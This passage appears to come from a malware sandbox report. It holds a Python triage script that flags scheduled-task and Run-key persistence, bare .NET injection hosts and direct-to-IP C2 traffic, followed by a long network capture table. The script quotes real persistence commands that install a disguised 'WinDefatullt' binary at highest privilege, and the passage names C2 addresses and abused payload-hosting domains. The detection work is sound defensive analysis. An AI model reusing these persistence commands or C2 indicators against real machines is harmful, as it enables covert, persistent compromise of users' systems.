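DOTNET_HOSTS = ("installutil.exe", "regasm.exe", "regsvcs.exe")
ABUSED_HOSTING = ("cdn.discordapp.com", "textbin.net", "img.guildedcdn.com", "mediafire.com")
USER_WRITABLE = re.compile(r"\\appdata\\(roaming|local)\\|\\users\\public\\|\\temp\\", re.I)


def _switch(name, cmdline):
    """Value of a schtasks switch such as /du 9999:59 or /tr "quoted path", or None."""
    m = re.search(r'(?:^|\s)/' + name + r'\s+("[^"]*"|\S+)', cmdline, re.I)
    return m.group(1).strip('"') if m else None


def _split_image(cmdline):
    """Return (image basename lower-cased, remaining arguments) for a Windows command line."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))\s*(.*)$', cmdline, re.S)
    image = (m.group(1) or m.group(2)) if m else ""
    return image.rsplit("\\", 1)[-1].lower(), (m.group(3).strip() if m else "")


def classify_cmdline(cmdline):
    """Tag one process command line with the patterns it matches (empty list = nothing seen)."""
    tags, low = [], cmdline.lower()
    image, args = _split_image(cmdline)

    if "schtasks" in low and "/create" in low:
        sc, ri, du, rl, tr = (_switch(k, cmdline) for k in ("sc", "ri", "du", "rl", "tr"))
        if sc and sc.lower() == "once" and ri:
            tags.append("schtasks:once+repeat")        # one-shot task that repeats every /ri minutes
        if du and du.startswith("9999"):
            tags.append("schtasks:duration-9999")      # ...for 9999 hours: a de facto forever loop
        if rl and rl.upper() == "HIGHEST":
            tags.append("schtasks:highest-runlevel")
        if tr and USER_WRITABLE.search(tr):
            tags.append("schtasks:user-writable-target")

    if "currentversion\\run" in low and re.search(r"new-itemproperty|set-itemproperty|reg(\.exe)?\s+add", low):
        tags.append("runkey:write")
        if USER_WRITABLE.search(cmdline):
            tags.append("runkey:user-writable-target")

    if image in DOTNET_HOSTS and not args:
        tags.append("dotnet-host:no-args")             # bare .NET utility = classic injection target
    return tags


def parse_network_rows(text):
    """Parse '| Country | Destination | Domain | Proto |' rows into (country, dest, domain, proto)."""
    rows = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        country, dest, domain, proto = cells
        if domain in ("tcp", "udp") and not proto:      # extraction dropped the empty Domain cell
            domain, proto = "", domain
        rows.append((country, dest, domain, proto))
    return rows


def triage_network(rows):
    """Return (direct-to-IP C2 candidates, abused hosting domains contacted), both sorted."""
    c2, hosting = set(), set()
    for _country, dest, domain, proto in rows:
        port = dest.rpartition(":")[2]
        if dest == "8.8.8.8:53" or domain.endswith(".in-addr.arpa"):
            continue                                    # resolver queries and sandbox PTR lookups
        if not domain and proto == "tcp" and port not in ("80", "443"):
            c2.add(dest)                                # no name, odd port: RAT-style direct connect
        elif any(domain == d or domain.endswith("." + d) for d in ABUSED_HOSTING):
            hosting.add(domain)
    return sorted(c2), sorted(hosting)


# Command lines copied from the process tree; the last one is a constructed benign control.
SAMPLE_CMDLINES = [
    r'"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f',
    r""""powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'""",
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"',
    r'schtasks /create /tn \Backup /tr "C:\Program Files\Vendor\backup.exe" /sc daily /st 02:00',  # constructed
]

# Rows copied from the Network table (one kept in its misaligned extracted form on purpose).
SAMPLE_NETWORK = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | img.guildedcdn.com | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 31.219.227.13.in-addr.arpa | udp |
| US | 148.72.177.212:443 | textbin.net | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| TR | 46.1.103.69:4263 | tcp | |
| TR | 46.1.103.69:7355 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 104.16.113.74:443 | mediafire.com | tcp |
| US | 216.239.32.181:443 | analytics.google.com | tcp |
"""

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(classify_cmdline(line) or "-", "<-", line[:60])
    print(triage_network(parse_network_rows(SAMPLE_NETWORK)))
```

The C2 rule deliberately keys on "no resolved name plus a non-web port" rather than on the specific address, so it survives a rebuilt sample; the two 46.1.103.69 ports and the abused CDN/paste hosts are what falls out when it is run over this report.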
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.113.22.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | img.guildedcdn.com | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 31.219.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.33.253.131.in-addr.arpa | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.14.97.104.in-addr.arpa | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | textbin.net | udp |
| US | 148.72.177.212:443 | textbin.net | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 212.177.72.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| TR | 46.1.103.69:4263 | | tcp |
| US | 8.8.8.8:53 | 69.103.1.46.in-addr.arpa | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| TR | 46.1.103.69:4263 | | tcp |
| TR | 46.1.103.69:7355 | | tcp |
| TR | 46.1.103.69:4263 | | tcp |
| TR | 46.1.103.69:7355 | | tcp |
| US | 8.8.8.8:53 | img.guildedcdn.com | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 148.72.177.212:443 | textbin.net | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| TR | 46.1.103.69:4263 | | tcp |
| US | 8.8.8.8:53 | 170.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 46.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mediafire.com | udp |
| US | 104.16.113.74:443 | mediafire.com | tcp |
| US | 104.16.113.74:443 | mediafire.com | tcp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| NL | 172.217.168.202:443 | ajax.googleapis.com | tcp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | cdn.amplitude.com | udp |
| US | 104.16.57.101:443 | static.cloudflareinsights.com | tcp |
| US | 18.239.63.113:443 | cdn.amplitude.com | tcp |
| US | 8.8.8.8:53 | 74.113.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.63.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.57.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 54.244.175.36:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| US | 18.239.94.35:443 | static.hotjar.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| NL | 142.250.179.138:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 36.175.244.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.94.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| NL | 142.250.102.156:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| US | 216.239.32.181:443 | analytics.google.com | tcp |
| US | 18.238.243.111:443 | script.hotjar.com | tcp |
| NL | 142.250.102.156:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | device.maxmind.com | udp |
| US | 162.159.134.22:443 | device.maxmind.com | tcp |
| US | 8.8.8.8:53 | 156.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.243.238.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | d-ipv6.mmapiws.com | udp |
| US | 172.64.145.79:443 | d-ipv6.mmapiws.com | tcp |
| US | 8.8.8.8:53 | 79.145.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | app.mediafire.com | udp |
| US | 216.239.32.181:443 | analytics.google.com | udp |
| US | 104.16.113.74:443 | app.mediafire.com | tcp |
| US | 104.16.113.74:443 | app.mediafire.com | tcp |
| US | 8.8.8.8:53 | sessions.bugsnag.com | udp |
| US | 35.190.88.7:443 | sessions.bugsnag.com | tcp |
| US | 35.190.88.7:443 | sessions.bugsnag.com | udp |
| NL | 172.217.168.202:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 7.88.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.mediafireuserupload.com | udp |
| US | 104.16.125.23:443 | www.mediafireuserupload.com | tcp |
| US | 8.8.8.8:53 | 23.125.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | the.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 172.67.144.62:443 | the.gatekeeperconsent.com | tcp |
| US | 104.22.75.216:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | www.ezojs.com | udp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| NL | 142.250.179.206:443 | translate.google.com | tcp |
| US | 172.67.170.144:443 | www.ezojs.com | tcp |
| US | 104.21.28.48:443 | the.gatekeeperconsent.com | tcp |
| US | 104.21.28.48:443 | the.gatekeeperconsent.com | udp |
| US | 172.67.144.62:443 | the.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | cdn.otnolatrnup.com | udp |
| US | 104.19.214.37:443 | cdn.otnolatrnup.com | tcp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| NL | 142.250.179.138:443 | content-autofill.googleapis.com | udp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | 62.144.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.75.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.170.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.28.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.214.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| NL | 142.251.36.10:443 | translate.googleapis.com | tcp |
| DE | 3.67.181.148:443 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | go.ezodn.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| DE | 172.217.23.194:443 | securepubads.g.doubleclick.net | tcp |
| US | 172.64.136.15:443 | go.ezodn.com | tcp |
| US | 172.64.136.15:443 | go.ezodn.com | tcp |
| US | 172.64.136.15:443 | go.ezodn.com | tcp |
| US | 172.67.144.62:443 | the.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | otnolatrnup.com | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | prebid.media.net | udp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| US | 34.120.63.153:443 | prebid.media.net | tcp |
| DE | 3.69.135.220:443 | tlx.3lift.com | tcp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| DE | 52.29.49.248:443 | btlr.sharethrough.com | tcp |
| DE | 52.29.49.248:443 | btlr.sharethrough.com | tcp |
| DE | 52.29.49.248:443 | btlr.sharethrough.com | tcp |
| DE | 52.29.49.248:443 | btlr.sharethrough.com | tcp |
| DE | 52.29.49.248:443 | btlr.sharethrough.com | tcp |
| US | 8.8.8.8:53 | 194.23.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.136.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.181.67.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.189.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.36.251.142.in-addr.arpa | udp |
| US | 172.64.136.15:443 | go.ezodn.com | udp |
| DE | 172.217.23.194:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| NL | 142.250.179.206:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 153.63.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.49.29.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.135.69.3.in-addr.arpa | udp |
| NL | 142.250.179.206:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| NL | 142.251.36.1:443 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | 1.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | eb2.3lift.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| NL | 104.85.0.200:443 | ads.pubmatic.com | tcp |
| NL | 104.85.0.23:443 | contextual.media.net | tcp |
| US | 8.8.8.8:53 | 200.0.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.0.85.104.in-addr.arpa | udp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 8.8.8.8:53 | image6.pubmatic.com | udp |
| GB | 185.64.190.78:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | sync.mathtag.com | udp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| CH | 185.29.132.241:443 | sync.mathtag.com | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| IE | 52.95.126.160:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | cms.quantserve.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | cr.frontend.weborama.fr | udp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | um.simpli.fi | udp |
| US | 8.8.8.8:53 | a.audrte.com | udp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | simage2.pubmatic.com | udp |
| NL | 142.250.179.194:443 | cm.g.doubleclick.net | tcp |
| NL | 142.250.179.194:443 | cm.g.doubleclick.net | tcp |
| NL | 142.250.179.194:443 | cm.g.doubleclick.net | tcp |
| IE | 54.74.78.236:443 | a.audrte.com | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| NL | 35.204.74.118:443 | um.simpli.fi | tcp |
| IE | 52.48.43.143:443 | sync.crwdcntrl.net | tcp |
| NL | 198.47.127.205:443 | simage2.pubmatic.com | tcp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | tcp |
| DK | 37.157.2.230:443 | c1.adform.net | tcp |
| DE | 3.75.62.37:443 | ups.analytics.yahoo.com | tcp |
| DE | 91.228.74.166:443 | cms.quantserve.com | tcp |
| US | 8.8.8.8:53 | 18.111.223.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.132.29.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.126.95.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | image2.pubmatic.com | udp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | udp |
| NL | 142.250.179.194:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 194.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.40.223.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.129.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.74.204.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.62.75.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.78.74.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.2.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.74.228.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.43.48.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dmp.adform.net | udp |
| US | 8.8.8.8:53 | simage4.pubmatic.com | udp |
| GB | 185.64.190.81:443 | simage4.pubmatic.com | tcp |
| US | 8.8.8.8:53 | 81.190.64.185.in-addr.arpa | udp |
| NL | 142.251.36.10:443 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | dsp.adfarm1.adition.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | t.adx.opera.com | udp |
| US | 8.8.8.8:53 | sync.srv.stackadapt.com | udp |
| US | 8.8.8.8:53 | match.prod.bidr.io | udp |
| US | 8.8.8.8:53 | uipglob.semasio.net | udp |
| US | 8.8.8.8:53 | pr-bh.ybp.yahoo.com | udp |
| US | 8.8.8.8:53 | pixel.onaudience.com | udp |
| US | 8.8.8.8:53 | mwzeom.zeotap.com | udp |
| US | 8.8.8.8:53 | pubmatic-match.dotomi.com | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | ad.turn.com | udp |
| US | 8.8.8.8:53 | pixel-sync.sitescout.com | udp |
| DE | 85.114.159.118:443 | dsp.adfarm1.adition.com | tcp |
| FR | 141.94.170.77:443 | pixel.onaudience.com | tcp |
| IE | 176.34.91.195:443 | pr-bh.ybp.yahoo.com | tcp |
| DE | 18.159.23.195:443 | x.bidswitch.net | tcp |
| DE | 37.252.171.53:443 | ib.adnxs.com | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| NL | 98.98.134.242:443 | pixel-sync.sitescout.com | tcp |
| US | 52.7.163.13:443 | sync.srv.stackadapt.com | tcp |
| DK | 77.243.51.122:443 | uipglob.semasio.net | tcp |
| NL | 63.215.202.140:443 | pubmatic-match.dotomi.com | tcp |
| US | 172.67.13.182:443 | mwzeom.zeotap.com | tcp |
| IE | 52.210.8.58:443 | match.prod.bidr.io | tcp |
| US | 8.8.8.8:53 | pool.admedo.com | udp |
| US | 8.8.8.8:53 | tags.bluekai.com | udp |
| NL | 104.99.233.6:443 | tags.bluekai.com | tcp |
| BE | 35.210.53.219:443 | pool.admedo.com | tcp |
| US | 8.8.8.8:53 | rtb-csync.smartadserver.com | udp |
| BE | 35.210.53.219:443 | pool.admedo.com | udp |
| FR | 185.86.139.103:443 | rtb-csync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | 8.213.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.134.98.98.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.159.114.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.170.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.171.252.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.202.215.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.13.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.23.159.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.91.34.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.51.243.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.8.210.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.163.7.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.233.99.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.53.210.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.139.86.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bh.contextweb.com | udp |
| US | 208.93.169.131:443 | bh.contextweb.com | tcp |
| US | 8.8.8.8:53 | 131.169.93.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 227.48.178.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cm.adgrx.com | udp |
| NL | 63.251.232.165:443 | cm.adgrx.com | tcp |
| US | 8.8.8.8:53 | sync-tm.everesttech.net | udp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| US | 8.8.8.8:53 | csync.loopme.me | udp |
| NL | 35.214.156.26:443 | csync.loopme.me | tcp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | udp |
| US | 8.8.8.8:53 | 165.232.251.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | tcp |
| US | 8.8.8.8:53 | d5p.de17a.com | udp |
| SE | 213.155.156.181:443 | d5p.de17a.com | tcp |
| NL | 35.214.156.26:443 | csync.loopme.me | tcp |
| US | 64.202.112.159:443 | b1sync.zemanta.com | tcp |
| US | 8.8.8.8:53 | p.rfihub.com | udp |
| NL | 193.0.160.130:443 | p.rfihub.com | tcp |
| US | 8.8.8.8:53 | ipac.ctnsnet.com | udp |
| US | 35.186.193.173:443 | ipac.ctnsnet.com | tcp |
| US | 8.8.8.8:53 | 159.112.202.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.160.0.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.156.155.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | core.iprom.net | udp |
| SI | 195.5.165.20:443 | core.iprom.net | tcp |
| US | 8.8.8.8:53 | ad.mrtnsvr.com | udp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| US | 8.8.8.8:53 | match.adsby.bidtheatre.com | udp |
| NL | 134.122.57.34:443 | match.adsby.bidtheatre.com | tcp |
| US | 8.8.8.8:53 | 173.193.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.165.5.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.163.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.57.122.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.tribalfusion.com | udp |
| US | 8.8.8.8:53 | cm-supply-web.gammaplatform.com | udp |
| US | 104.18.24.173:443 | a.tribalfusion.com | tcp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| US | 8.8.8.8:53 | green.erne.co | udp |
| FR | 141.95.171.141:443 | green.erne.co | tcp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| US | 8.8.8.8:53 | matching.truffle.bid | udp |
| US | 8.8.8.8:53 | s.tribalfusion.com | udp |
| US | 8.8.8.8:53 | pixel-eu.onaudience.com | udp |
| FR | 146.59.148.16:443 | pixel-eu.onaudience.com | tcp |
| DE | 162.55.120.196:443 | matching.truffle.bid | tcp |
| US | 8.8.8.8:53 | 173.24.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.171.95.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 46.228.174.117:443 | sync.1rx.io | tcp |
| US | 8.8.8.8:53 | ads.playground.xyz | udp |
| US | 34.102.253.54:443 | ads.playground.xyz | tcp |
| US | 8.8.8.8:53 | ad.turn.com | udp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| US | 8.8.8.8:53 | 16.148.59.146.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.174.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.120.55.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.253.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.164.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sync.targeting.unrulymedia.com | udp |
| US | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| NL | 142.251.36.46:443 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | tcp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
